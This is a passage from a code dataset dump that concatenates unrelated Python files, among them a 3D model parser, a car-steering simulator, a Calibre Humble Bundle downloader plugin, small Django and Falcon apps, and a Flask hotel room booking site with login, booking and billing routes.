triangle_data = file.read(cls.size)\n triangle_struct = struct.unpack(cls.format, triangle_data)\n\n return Triangle(*triangle_struct)\n\n\nclass Triangles:\n Class = Triangle\n\n @classmethod\n def write(cls, file, triangles):\n for triangle in triangles:\n cls.Class.write(file, triangle)\n\n @classmethod\n def read(cls, file):\n return [cls.Class(*c) for c in struct.iter_unpack(cls.Class.format, file.read())]\n\n\nclass Frame:\n \"\"\"Class for representing a frame\n\n A Frame is an object that represents the state of the model at a single\n frame of animation.\n\n Attributes:\n scale: The frame scale\n\n translate: The frame offset\n\n name: The name of the frame.\n\n vertexes: A list of TriVertex objects.\n \"\"\"\n\n format = '<6f16s'\n size = struct.calcsize(format)\n\n __slots__ = (\n 'scale',\n 'translate',\n 'name',\n 'vertexes'\n )\n\n def __init__(self,\n scale_x,\n scale_y,\n scale_z,\n translate_x,\n translate_y,\n translate_z,\n name):\n\n self.scale = scale_x, scale_y, scale_z\n self.translate = translate_x, translate_y, translate_z\n self.name = name\n\n if type(name) is bytes:\n self.name = name.split(b'\\00')[0].decode('ascii')\n\n self.vertexes = []\n\n @classmethod\n def write(cls, file, frame):\n frame_data = struct.pack(cls.format,\n *frame.scale,\n *frame.translate,\n frame.name.encode('ascii'))\n\n file.write(frame_data)\n\n for vertex in frame.vertexes:\n TriVertex.write(file, vertex)\n\n @classmethod\n def read(cls, file, number_of_vertexes):\n frame_data = file.read(cls.size)\n frame_struct = struct.unpack(cls.format, frame_data)\n\n frame = Frame(*frame_struct)\n frame.vertexes = [TriVertex.read(file) for _ in range(number_of_vertexes)]\n\n return frame\n\n\nclass GlVertex:\n format = '<2fi'\n size = struct.calcsize(format)\n\n __slots__ = (\n 's',\n 't',\n 'vertex'\n )\n\n def __init__(self,\n s,\n t,\n vertex):\n\n self.s = s\n self.t = t\n self.vertex = vertex\n\n @classmethod\n def write(cls, file, gl_vertex):\n gl_vertex_data = struct.pack(cls.format,\n gl_vertex.s,\n gl_vertex.t,\n gl_vertex.vertex)\n\n file.write(gl_vertex_data)\n\n @classmethod\n def read(cls, file):\n gl_vertex_data = file.read(cls.size)\n gl_vertex_struct = struct.unpack(cls.format, gl_vertex_data)\n\n return GlVertex(*gl_vertex_struct)\n\n\nTRIANGLE_STRIP = 1\nTRIANGLE_FAN = -1\n\n\nclass GlCommand:\n __slots__ = (\n 'mode',\n 'vertexes'\n )\n\n def __init__(self, mode):\n self.mode = mode\n\n @classmethod\n def write(cls, file, gl_command):\n vertex_count = len(gl_command.vertexes) * gl_command.mode\n vertex_count_data = struct.pack(' self.distance_limit or abs(self.angle) > self.angle_limit:\n self._add_penalty()\n frame = self._pipeline(img=frame, tx=0, ry=0)\n return frame, True\n\n # transform current frame\n # simulated_frame = self._pipeline(img=frame, tx=self.distance, ry=self.angle)\n\n # compute wheel angle and radius of the real car\n steer = eps if abs(steer) < eps else steer\n wheel_angle = steering.get_delta_from_steer(steer)\n R = steering.get_radius_from_delta(wheel_angle)\n\n # check is the simulated car is after circle's center\n # can't be simulated\n if self.distance > R > 0 or self.distance < R < 0:\n self._add_penalty()\n frame = self._pipeline(img=frame, tx=0, ry=0)\n print(\"Some circle check\")\n return frame, True\n\n # estimate position of the real car\n # the condition is to avoid dividing by zero when computing Bx,\n # thus Bx1 != Bx2 always\n alpha = velocity * delta_time / R\n assert -math.pi < alpha < math.pi, \"Turns bigger than 180 are not allowed\"\n\n if abs(alpha - math.pi / 2) < eps:\n alpha = math.pi / 2 - eps\n x = R * (1 - np.cos(alpha))\n y = R * np.sin(alpha)\n\n # compute line from new position to the center of the circle\n p1 = np.array([x, y, 1])\n p2 = np.array([R, 0, 1])\n d1 = np.cross(p1, p2)\n d1 /= np.linalg.norm(d1[0:2])\n\n # fitler predicted steer\n # self.avg_predicted_steer = predicted_steer if sel.avg_predicted_steer is None \\\n # else .5 * self.avg_predicted_steer + 0.5 * predicted_steer\n self.avg_predicted_steer = predicted_steer\n\n # compute wheel angle and radius for simulated car\n self.avg_predicted_steer = eps if abs(self.avg_predicted_steer) < eps else self.avg_predicted_steer\n sim_wheel_angle = steering.get_delta_from_steer(self.avg_predicted_steer)\n sim_R = steering.get_radius_from_delta(sim_wheel_angle)\n\n # d2 = (a, b, c), where a * x + b * y + c = 0 with the above params\n # line perpendicular to car's orientation that passes through (distance, 0)\n d2 = np.zeros((3,))\n d2[0] = np.sin(self.angle)\n d2[1] = np.cos(self.angle)\n d2[2] = -d2[0] * self.distance\n\n # compute circle center (Cx, Cy) with radius sim_R that passes through (distance, 0)\n # we have the system\n # d2[0] * Cx + d2[1] * Cy + d[2] = 0\n # (Cx - cumulative_distance)**2 + Cy**2 = sim_R**2\n # from the first equation, and due to the fact that maximum angle is 90, we can divide by d2[1]\n # Cy = -d[0]/d[1] * Cx - d[2]/d[1]\n # using notation with m & n\n # Cy = m * Cx + n\n m = -d2[0] / d2[1]\n n = -d2[2] / d2[1]\n\n # substituting in the second equation\n # (Cx - cumulative_d)**2 + (m * Cx + n)**2 = sim_R**2\n # we obtain the quadratic equation\n # (m**2 + 1) * Cx**2 + (-2cumulative_d + 2mn) * Cx + (cumulative_d**2 + n**2 - sim_R**2) = 0\n a = m ** 2 + 1\n b = 2 * (m * n - self.distance)\n c = n ** 2 + self.distance ** 2 - sim_R ** 2\n\n discriminant = b ** 2 - 4 * a * c\n Cx1 = (-b + np.sqrt(discriminant)) / (2 * a)\n Cx2 = (-b - np.sqrt(discriminant)) / (2 * a)\n\n Cx = max(Cx1, Cx2) if sim_wheel_angle >= 0 else min(Cx1, Cx2)\n Cy = m * Cx + n\n\n # compute the new position of the car, (Bx, By)\n # we constrain (Bx, By) to be on the d1 line\n # so we compute the intersection of the line d1 with the circle ((Cx, Cy), sim_R)\n a = d1[0] ** 2 + d1[1] ** 2\n b = -2 * d1[1] ** 2 * Cx + 2 * d1[0] * (d1[2] + d1[1] * Cy)\n c = d1[1] ** 2 * Cx ** 2 + (d1[2] + d1[1] * Cy) ** 2 - d1[1] ** 2 * sim_R ** 2\n discriminant = b ** 2 - 4 * a * c\n\n # check if no solution\n if discriminant < 0:\n # this means no solution, car is behind\n self._add_penalty()\n return frame, True\n\n Bx1 = (-b + np.sqrt(discriminant)) / (2 * a)\n Bx2 = (-b - np.sqrt(discriminant)) / (2 * a)\n sgn_R = 1 if R >= 0 else -1\n turn_sgn = 1 if sgn_R * (x - R) < 0 else -1\n\n # this formula holds if the car makes a turn smaller than 90 degrees (turn_sgn = 1)\n # and bigger than 90 degrees (turn_sgn = -1)\n Bx = turn_sgn * min(turn_sgn * Bx1, turn_sgn * Bx2) \\\n if sim_wheel_angle > 0 else turn_sgn * max(turn_sgn * Bx1, turn_sgn * Bx2)\n By = (-d1[0] * Bx - d1[2]) / d1[1]\n\n # update distance\n sgn = 1 if np.cross(np.array([Bx, By]), np.array([x, y])) >= 0 else -1\n self.distance = sgn * np.sqrt((Bx - x) ** 2 + (By - y) ** 2)\n\n # update cumulative angle\n # vector from the center to the new position \n # vector perpendicular to the one above v = \n # make it point in the positive/negative OY direction sign(Bx-Cx) * v\n # normalize v = v / norm(v)\n # take dot product with normal vector of d1 to get cos of angle, and arccos to get the angle\n # angle = angle * sign(vx), v = \n v1 = np.array([Cy - By, Bx - Cx])\n sgn = turn_sgn if v1[1] >= 0 else -turn_sgn\n v1 = sgn * v1 / np.linalg.norm(v1)\n\n v2 = np.array([d1[0], d1[1]])\n sgn = turn_sgn if v2[1] >= 0 else -turn_sgn\n v2 = sgn * v2 / np.linalg.norm(v2)\n\n sgn = 1 if np.cross(v1, v2) >= 0 else -1\n self.angle = sgn * np.arccos(np.clip(np.dot(v1, v2), -1, 1))\n\n simulated_frame = self._pipeline(img=frame, tx=self.distance, ry=self.angle)\n return simulated_frame, False\n","sub_path":"simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":10088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"476628162","text":"# -*- coding:utf-8 -*-\n\"\"\"\ncreated by server on 15-2-11下午3:49.\n\"\"\"\nfrom gfirefly.server.globalobject import remoteserviceHandle\nfrom gfirefly.server.logobj import logger\nfrom app.proto_file.common_pb2 import GetGoldResponse\nfrom app.proto_file.game_pb2 import GameLoginRequest\nfrom shared.db_opear.configs_data import game_configs\n\n\n@remoteserviceHandle('gate')\ndef get_gold_2001(data, player):\n \"\"\"客户端充值完成后,获取充值币信息\"\"\"\n request = GameLoginRequest()\n request.ParseFromString(data)\n pay_arg = dict(openkey=request.open_key,\n pay_token=request.pay_token,\n pf=request.pf,\n pfkey=request.pfkey)\n response = GetGoldResponse()\n player.pay.refresh_pay_arg(pay_arg) # 设置支付参数\n\n logger.debug(\"recharge_id %s\" % request.recharge_id)\n # add 月卡\n recharge_item = game_configs.recharge_config.get(request.recharge_id)\n if recharge_item is None:\n logger.debug('not in rechargeconfig:%s', data.get('productId'))\n else:\n player.recharge.recharge_gain(recharge_item, response, 5,\n True) # 发送奖励邮件\n response.res.result = True\n\n player.pay.recharge()\n response.res.result = True\n player.recharge.get_recharge_response(response)\n logger.debug(\"get_gold_2001============%s\" % response)\n return response.SerializeToString()\n","sub_path":"app/game/action/node/sdk_tencent.py","file_name":"sdk_tencent.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"146665355","text":"import nipype\n\nfrom ..template import (define_template_workflow,\n TemplateInput,\n AnatomicalSegmentation,\n TemplateReport)\n\n\nclass TestTemplateWorkflow(object):\n\n def test_template_workflow_creation(self, lyman_info):\n\n proj_info = lyman_info[\"proj_info\"]\n subjects = lyman_info[\"subjects\"]\n\n wf = define_template_workflow(\n proj_info, subjects\n )\n\n # Check basic information about the workflow\n assert isinstance(wf, nipype.Workflow)\n assert wf.name == \"template\"\n assert wf.base_dir == proj_info.cache_dir\n\n # Check root directory of output\n template_out = wf.get_node(\"template_output\")\n assert template_out.inputs.base_directory == proj_info.proc_dir\n\n # Check the list of nodes we expect\n expected_nodes = [\"subject_source\", \"template_input\",\n \"crop_image\", \"zoom_image\", \"reorient_image\",\n \"generate_reg\", \"invert_reg\",\n \"transform_wmparc\", \"anat_segment\",\n \"hemi_source\", \"tag_surf\", \"combine_hemis\",\n \"template_qc\", \"template_output\"]\n expected_nodes.sort()\n assert wf.list_node_names() == expected_nodes\n\n # Check iterables\n subject_source = wf.get_node(\"subject_source\")\n assert subject_source.iterables == (\"subject\", subjects)\n\n def test_template_input(self, freesurfer):\n\n out = TemplateInput(\n data_dir=freesurfer[\"data_dir\"],\n subject=freesurfer[\"subject\"]\n ).run().outputs\n\n assert out.norm_file == freesurfer[\"norm_file\"]\n assert out.wmparc_file == freesurfer[\"wmparc_file\"]\n\n output_path = \"{}/template\".format(freesurfer[\"subject\"])\n assert out.output_path == output_path\n\n def test_anatomical_segmentation(self, execdir, freesurfer):\n\n out = AnatomicalSegmentation(\n wmparc_file=freesurfer[\"wmparc_file\"],\n ).run().outputs\n\n assert out.seg_file == execdir.join(\"seg.nii.gz\")\n assert out.mask_file == execdir.join(\"mask.nii.gz\")\n\n def test_template_report(self, execdir, template):\n\n out = TemplateReport(\n seg_file=template[\"seg_file\"],\n mask_file=template[\"mask_file\"],\n surf_file=template[\"surf_file\"],\n anat_file=template[\"anat_file\"],\n ).run().outputs\n\n assert out.seg_plot == execdir.join(\"seg.png\")\n assert out.mask_plot == execdir.join(\"mask.png\")\n assert out.surf_plot == execdir.join(\"surf.png\")\n assert out.anat_plot == execdir.join(\"anat.png\")\n","sub_path":"lyman/workflows/tests/test_template.py","file_name":"test_template.py","file_ext":"py","file_size_in_byte":2707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"298490305","text":"s=sorted(map(int, input().strip().split()))\na,b,c=map(lambda s:s**2, s)\nif s[0]+s[1]<=s[2]:\n print('Not triangle')\nelse:\n if a+bc:\n print('Acute triangle')\n else:\n print('Right triangle')\n\n if (a==b or b==c):\n print('Isosceles triangle')\n if a==c:\n print('Equilateral triangle')\n\n\n\n","sub_path":"Oj_Problem/others/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222099985","text":"#!/usr/bin/env python2 \n\n__license__ = 'MIT'\n__copyright__ = '2018, bd-ober '\n__docformat__ = 'restructuredtext en'\n\nfrom PyQt5.Qt import QRunnable, QObject, pyqtSlot, pyqtSignal\n\nfrom calibre_plugins.hb_downloader.hb_downloader.humble_api.humble_api import HumbleApi\nfrom calibre_plugins.hb_downloader.hb_downloader.humble_download import HumbleDownload\nfrom calibre_plugins.hb_downloader.hb_downloader.config_data import ConfigData\n\nfrom calibre.gui2.dialogs.progress import ProgressDialog\n\nclass importerSignals(QObject):\n \n log = pyqtSignal(str)\n done_downloads = pyqtSignal(list)\n\n\n\nclass importer(QRunnable):\n \n def __init__(self, db, auth_token, dl_loc):\n super(importer, self).__init__()\n \n self.db = db\n self.auth_token = auth_token\n self.dl_loc = dl_loc\n \n self.download_names = []\n \n self.signals = importerSignals()\n \n self.pd = ProgressDialog(_('Fetching books...'),\n _('Connecting to Humble Bundle...'),\n min=0, max=0,\n icon='images/icon.png'\n )\n \n \n @pyqtSlot()\n def run(self):\n self.pd.show()\n \n # Identify any existing books with humblebundle tag\n existing_hb_filenames = self.db.all_field_names('#humble_filenames')\n self.signals.log.emit(str(len(existing_hb_filenames)) + ' existing books from Humble Bundle identified.')\n \n # Attempt to authenticate\n hapi = HumbleApi(self.auth_token)\n ConfigData.download_location = self.dl_loc\n \n if hapi.check_login():\n self.signals.log.emit('Authentication successful...')\n else:\n self.signals.log.emit('Unable to login - check authentication token.')\n self.done()\n \n # Get orders\n game_keys = hapi.get_gamekeys()\n self.signals.log.emit('%s orders/keys found...' % (len(game_keys)))\n \n key_downloads = dict()\n \n # Get relevant downloads\n num_books_found = 0\n num_new_books = 0\n for key in game_keys:\n humble_downloads = []\n order = hapi.get_order(key)\n \n for subproduct in order.subproducts or []:\n for download in subproduct.downloads or []:\n # Check platform\n if download.platform != 'ebook':\n continue\n \n for dl_struct in download.download_structs:\n num_books_found += 1\n \n # Check filename\n if dl_struct.filename in existing_hb_filenames:\n continue\n \n self.download_names.append(dl_struct.filename)\n humble_downloads.append( HumbleDownload(download, dl_struct, order, subproduct, key) )\n num_new_books += 1\n \n key_downloads[key] = humble_downloads\n \n self.signals.log.emit('(%s/%s) books found do not already exist in Calibre...' % (num_new_books, num_books_found) )\n\n \n ticker = 0\n for key in key_downloads:\n # Update URL in case of expiry\n HumbleDownload.update_download_list_url(hapi, key_downloads.get(key))\n \n for hd in key_downloads.get(key):\n ticker += 1\n if self.pd.canceled:\n self.signals.log.emit('Downloads aborted.')\n self.pd.close()\n self.pd.deleteLater()\n return\n \n self.pd.msg = '(%s/%s) Downloading %s ...' % (ticker, num_new_books, hd.filename)\n hd.download_file()\n \n self.done()\n\n\n def done(self):\n self.signals.done_downloads.emit(self.download_names)\n self.signals.log.emit('Downloads complete.')\n \n self.pd.close()\n self.pd.deleteLater()\n","sub_path":"importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"242334099","text":"from django.conf.urls import url\n\nfrom . import views\n\n\napp_name = 'post'\n\nurlpatterns = [\n url(r'^$', views.IndexView.as_view(), name='home'),\n url(r'^show', views.ShowView.as_view(), name='showlist'),\n url(r'^enter', views.EnterResolution.as_view(), name='enter'),\n url(r'^register', views.register, name='register'),\n url(r'^login/', views.user_login, name='login'),\n url(r'^logout/', views.user_logout, name='logout'),\n ]\n\n\n","sub_path":"post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"471584775","text":"from itertools import accumulate\nN,K = map(int, input().split())\nS = list(map(int, input()))\n\ngroups = list()\nnow = 1\ncnt = 0\n\nfor s in S:\n if s == now:\n cnt += 1\n else:\n groups.append(cnt)\n now ^= 1\n cnt = 1\n\ngroups.append(cnt)\n\nif len(groups) % 2 == 0:\n groups.append(0)\n\ncumsum = [0] + list(accumulate(groups))\n\nAdd = 2 * K + 1\n\nans = 0\n\nfor i in range(0,len(groups), 2):\n left = i\n right = min(i + Add, len(groups))\n tmp = cumsum[right] - cumsum[left]\n\n ans = max(tmp,ans)\n\nprint(ans)\n","sub_path":"atcoder/ABC/124/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"470284542","text":"from wsgiref.simple_server import make_server\n\nimport falcon\nimport json\nimport cv2\nimport os\nimport numpy as np\nimport utils\n\nPORT = 7777\nINPUT_VIDEO_FPATH = 'data/2018-02-2715_03_24.ogv'\n\nhtml_body_template = '''\n\nMug Detector\n\n\n%s\n\n'''\n\nclass MugResource:\n def on_get(self, req, resp):\n print(f'Ensuring {INPUT_VIDEO_FPATH} was processed...')\n utils.ensure_video_precessed(INPUT_VIDEO_FPATH)\n \n resp.content_type = 'text/html'\n images, captions = utils.get_switches(INPUT_VIDEO_FPATH)\n images_with_captions = \"\"\n for im, cap in zip(images, captions):\n images_with_captions += f\"\"\"

\"{cap}\"

\n \"\"\"\n resp.body = html_body_template % images_with_captions\n resp.status = falcon.HTTP_200\n\ndef get_app():\n app = falcon.API()\n app.add_route('/', MugResource())\n app.add_static_route('/image', os.path.abspath('./') + '/')\n return app\n\napp = get_app()\n\nif __name__ == '__main__':\n with make_server('', PORT, app) as httpd:\n print(f'Serving on port {PORT}...')\n httpd.serve_forever()\n","sub_path":"app/mug_server.py","file_name":"mug_server.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"334507013","text":"from django.shortcuts import render\nfrom apps.tienda.models import Product\n# Create your views here.\n\n\ndef home(request):\n products = Product.objects.all().filter(\n is_available=True).order_by('-id')[:12]\n context = {\n 'products': products,\n }\n return render(request, 'home.html', context)\n","sub_path":"musicpro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"564332602","text":"\nimport json\nfrom flask_cors import CORS\nfrom flask import Flask, request, jsonify, render_template, redirect, flash, url_for\nfrom flask_login import LoginManager, current_user, login_user, login_required, logout_user\nfrom sqlalchemy.exc import IntegrityError\nfrom models import db, User, Customer #add application models\nfrom models import Room , Booking , Bill\nimport datetime\n\n''' Begin Flask Login Functions '''\nlogin_manager = LoginManager()\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.filter_by(id=user_id).first()\n\n#N.B. Remember me cookies are for the event a user logs out accidentally\n\n#THE URL TO REDIRECTS USER TO IF THEY ARENT LOGGED IN\nlogin_manager.login_view = \"loginForm\"\n#Store the previous page that required login...and redirects user to it if true\nlogin_manager.use_session_for_next= False\n\n#Duration of the login_manager remember me session cookie\nlogin_manager.REMEMBER_COOKIE_DURATION= datetime.timedelta(minutes= 1)\n#Prevents client side scripts from accessing it\nlogin_manager.REMEMBER_COOKIE_HTTPONLY= False\n#Refreshes cookie on each request: if true\nlogin_manager.REMEMBER_COOKIE_REFRESH_EACH_REQUEST= True\n''' End Flask Login Functions '''\n\n\n''' Begin boilerplate code '''\n\n\ndef create_app():\n app = Flask(__name__, static_url_path='')\n app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n app.config['SECRET_KEY'] = \"MYSECRET\"\n CORS(app)\n db.init_app(app)\n login_manager.init_app(app)\n return app\n\napp = create_app()\n\napp.app_context().push()\n\n''' End Boilerplate Code '''\n\n\n#find user and pass to home.html if logged in\n\n\n@app.route('/', methods=['GET']) \ndef home():\n \n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('Home.html', user= user)\n return render_template('Home.html')\n\n\n@app.route('/signupForm', methods=['GET'])\ndef display_signup():\n return render_template('Signup.html')\n\n@app.route('/rooms') \ndef display_rooms():\n rooms = Room.query.all()\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('Room.html', user= user , rooms=rooms)\n return render_template('Room.html' , rooms=rooms)\n\n@app.route('/about') \ndef display_about():\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('About.html', user = user)\n return render_template('About.html')\n\n@app.route('/loginForm', methods=['GET'])\ndef loginForm():\n return render_template('Login.html')\n \n\n@app.route('/signup', methods=['POST'])\ndef sign_up():\n data= request.form # get json data (aka submitted login_id, email & password)\n \n if data == None:\n flash(\"Invalid request.\")\n return redirect(\"/\")\n\n if data['password'] !=data['confirm_password']:\n flash(\"Passwords must match!\")\n return redirect(url_for('display_signup'))\n\n elif data['password']=='' or data['email']=='':\n flash(\"Email and password fields must be filled!\")\n return redirect(url_for('display_signup'))\n\n try:\n \n user = User( email=data['email'])\n user.set_password( data['password'])\n customer= Customer(email= data['email'], firstName= data['firstName'], lastName= data['lastName'], phoneNumber= data['phoneNumber'], country=data['country'], address= data['address'])\n db.session.add(user)\n db.session.add(customer)\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n flash('Sign up failed: Account could not be created.')\n return redirect(url_for(\"display_signup\") )\n \n flash(\" Account created\")\n return redirect('/loginForm')\n \n \n@app.route('/login', methods=['POST'])\ndef login(): \n data= request.form\n if data['email']!='' and data['password']!='':\n user= User.query.filter_by(email=data['email']).first()\n if user and user.check_password(data['password']):\n \n login_user( user, remember=True, duration= datetime.timedelta(hours= 1) )\n flash(\"You have logged in successfully\")\n \n return redirect( url_for(\".display_rooms\") )\n \n flash(\"Login Failed: Invalid User email or password. \")\n return redirect( url_for('.loginForm') )\n\n flash(\"Login Failed: please Enter your credentials before submitting. \")\n return redirect( url_for('.loginForm') )\n \n \n@app.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n flash('Logged Out!')\n return redirect(url_for('.home'))\n\n\n\n\n@app.route(\"/book//\", methods=[\"GET\"])\n@login_required\ndef display_booking(roomType , roomNumber):\n\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('Book.html', user= user, roomNumber= roomNumber, roomType= roomType)\n\n return render_template( \"/loginForm\" )\n\n\n#Adds a booking: includes creating a bill & book room\n@app.route(\"/book//\", methods=[\"POST\"])\n@login_required\ndef addBooking(roomType , roomNumber): \n data= request.form\n\n if data and current_user.is_authenticated:\n #Get the current user's info: for tab bar\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n\n #Get dates for calculation\n endDate = data['trip-end']\n startDate = data['trip-start']\n\n \n\n #Split Date Strings into [year, month, day]\n endDate = data['trip-end'].split('-')\n startDate = data['trip-start'].split('-')\n #Create Date object using datetime\n d1= datetime.datetime( int(endDate[0]), int(endDate[1]), int(endDate[2]) )\n d2= datetime.datetime( int(startDate[0]), int(startDate[1]), int(startDate[2]) )\n print(endDate)\n print(startDate)\n print(\"Room \\n\\n\", type(roomNumber) )\n\n #Note\n #Initially you had the check out date being store as the check in date and vice versa\n\n #Make Booking object\n booking = Booking( roomNumber = int(roomNumber) , roomType = roomType , check_in_Date= d2 , check_out_Date=d1 , userEmail= current_user.email)\n #Get room and \n room = Room.query.filter_by(roomNumber= int(roomNumber) ).first()\n #set room.available=False\n room.book()\n\n try:\n db.session.add(booking)\n db.session.add(room)\n db.session.commit()\n\n #Create Bill - Once booking is sucessful\n room= Room.query.filter_by(roomType = roomType).first()\n roomRate = room.roomRate\n print(\"Room rate: \",roomRate)\n\n \n bill = Bill(roomNumber = int(roomNumber) , roomType = roomType , check_in_Date= d2 , check_out_Date=d1 , userEmail= current_user.email , roomRate = float(roomRate) )\n\n bill.calculateBill()\n try:\n db.session.add(bill)\n db.session.commit()\n except IntegrityError:\n db.session.rollback()\n \n flash(\"Your room has been successfully booked.\")\n return redirect(\"/MyBookings\")\n \n except IntegrityError:\n db.session.rollback()\n flash(\"Your booking already exist.\")\n \n return render_template('Book.html', user= user, roomNumber= roomNumber, roomType= roomType)\n\n flash(\"Invalid request.\")\n return redirect(\"/loginForm\")\n\n\n\n\n#Route for a specific room type\n@app.route('/rooms/')\n@login_required\ndef display_roomType(roomType):\n\n rooms = Room.query.filter_by(roomType = roomType , available=True)\n\n roomCount=0\n for room in rooms:\n roomCount = roomCount + 1\n\n\n rooms = Room.query.filter_by(roomType = roomType , available=True).first()\n\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n return render_template('Roomtype.html', user= user , roomType = roomType , rooms = rooms , roomCount = roomCount)\n \n return render_template('Roomtype.html' , roomType = roomType , rooms = rooms,roomCount = roomCount)\n\n\n\n\n@app.route('/MyBookings')\n@login_required\ndef display_bookings():\n\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n\n userbooking= user['bookings']\n \n return render_template('Userbookings.html' , user=user , bookingdetails= userbooking)\n \n flash(\"Only logged in users can access the previous page!\")\n return redirect(\"/loginForm\")\n\n \n\n@app.route('/MyAccount')\n@login_required\ndef display_AcountDetails():\n\n if current_user.is_authenticated:\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n\n accountdetails = Customer.query.filter_by(email= current_user.email).first()\n\n return render_template('Userdetails.html' , user=user , accountdetails=accountdetails)\n\n\n#Deletes booking & unbook Room: including, booking, bill\n@app.route(\"/delete//\", methods=['GET'])\n@login_required\ndef delete_booking(roomType, roomNumber):\n if current_user.is_authenticated:\n booking = Booking.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n if booking!=None:\n \n\n room = Room.query.filter_by(roomNumber= int(roomNumber) ).first()\n #set room.available=False\n room.unbook()\n\n bill= Bill.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n\n try:\n db.session.delete(booking)\n db.session.delete(bill)\n #room is not deleted but updated, so we just add the update\n db.session.add(room)\n db.session.commit()\n flash(\"Your booking has been successfully deleted.\")\n \n except:\n db.session.rollback()\n flash(\"Booking failed to delete.\")\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n\n userbooking= user['bookings']\n \n return render_template('Userbookings.html' , user=user , bookingdetails= userbooking)\n\n flash(\"Only logged in users can access the previous page!\")\n return redirect(\"/loginForm\")\n\n#Edit user account details\n@app.route(\"/MyProfile/edit\", methods=['POST'])\n@login_required\ndef edit_account():\n data= request.form # get json data (aka submitted login_id, email & password)\n \n if data != None:\n if data['password'] !=data['confirm_password']:\n flash(\"Passwords must match!\")\n return redirect(\"/MyProfile\")\n\n \n\n user= User.query.filter_by(email= current_user.email).first()\n \n if data['firstName'] !='':\n user.customer.firstName= data['firstName']\n\n if data['lastName'] !='':\n user.customer.lastName= data['lastName']\n\n if data['password'] !='':\n user.set_password(data['password'])\n\n if data['country'] !='':\n user.customer.country= data['country']\n \n if data['phoneNumber'] !='':\n user.customer.phoneNumber= data['phoneNumber']\n\n if data['address'] !='':\n user.customer.address= data['address']\n\n try:\n \n db.session.add(user)\n db.session.commit()\n \n except IntegrityError:\n db.session.rollback()\n flash('Update failed: Account could not be updated.')\n return redirect(\"/MyProfile\" )\n \n flash(\"Your account has been successfully updated.\")\n #return redirect('/MyProfile')\n return redirect('/MyAccount')\n \n flash(\"No Data has been captured.\")\n return redirect('/MyProfile')\n\n\n@app.route('/MyBookings/updateForm//', methods=['GET']) \n@login_required\ndef display_booking_updateForm(roomType, roomNumber):\n user= User.query.filter_by(email= current_user.email).first()\n user= user.toDict()\n booking = Booking.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n booking= booking.toDict()\n return render_template('Updateuserbookings.html', user= user, booking= booking)\n\n\n#Updates a user booking and bill\n#Updates a user booking and bill\n@app.route('/MyBookings/updateForm//', methods=['POST']) \n@login_required\ndef update_booking(roomType, roomNumber):\n data= request.form\n if roomType==None or roomNumber==None or data==None:\n flash(\"An invalid request was attempted.\")\n return redirect(\"/\")\n \n endDate = data['trip-end']\n startDate = data['trip-start']\n\n booking = Booking.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n\n\n\n booking.check_in_Date = datetime.datetime.strptime(startDate, \"%Y-%m-%d\").date()\n booking.check_out_Date = datetime.datetime.strptime(endDate, \"%Y-%m-%d\").date()\n \n bill= Bill.query.filter_by(userEmail= current_user.email, roomType= roomType, roomNumber= int(roomNumber) ).first()\n\n #Create a date objects to add to bill\n bill.check_in_Date = datetime.datetime.strptime(startDate, \"%Y-%m-%d\").date()\n bill.check_out_Date = datetime.datetime.strptime(endDate, \"%Y-%m-%d\").date()\n\n bill.calculateBill()\n\n try: \n db.session.add(booking)\n db.session.add(bill)\n db.session.commit()\n\n flash(\"Update was successful.\")\n \n except: \n db.session.rollback()\n flash(\"Update failed.\")\n\n return redirect(\"/MyBookings\")\n\n\n@app.route('/deleteUser', methods=['POST'])\n@login_required\ndef delete_user():\n user= User.query.filter_by(email= current_user.email).first()\n customer= Customer.query.filter_by(email= current_user.email).first()\n\n bookings= Booking.query.all()\n\n \n\n try:\n if bookings != None:\n for booking in bookings:\n if booking.userEmail == current_user.email:\n \n room= Room.query.filter_by(roomNumber= booking.roomNumber).first()\n room.unbook()\n \n bill= 